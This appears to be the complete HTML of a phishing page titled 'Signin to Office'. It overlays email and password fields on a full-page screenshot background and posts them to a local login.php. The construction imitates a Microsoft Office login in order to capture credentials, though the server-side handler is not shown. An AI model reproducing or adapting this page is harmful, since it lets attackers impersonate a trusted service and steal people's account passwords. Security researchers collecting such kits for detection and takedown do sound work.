<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Signin to Office</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1365px; height:660px; z-index:0"><img src="images/paste58.jpg" alt="" title="" border=0 width=1365 height=660></div>

<form name="form1" method="POST" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:354px;left:916px;top:181px;z-index:2;height: 31px;" placeholder="Someone@example.com" required="">
<input name="formtext2" type="password" style="position:absolute;width:354px;left:916px;top:218px;z-index:3;height: 31px;" placeholder="Password" required="">
<div id="formcheckbox1" style="position:absolute; left:913px; top:276px; z-index:4"><input type="checkbox" name="formcheckbox1"></div>
<div id="formimage1" style="position:absolute; left:916px; top:321px; z-index:5"><input type="image" name="formimage1" width="74" height="41" src="images/signin.JPG"></div>
</form>


</body>
</html>
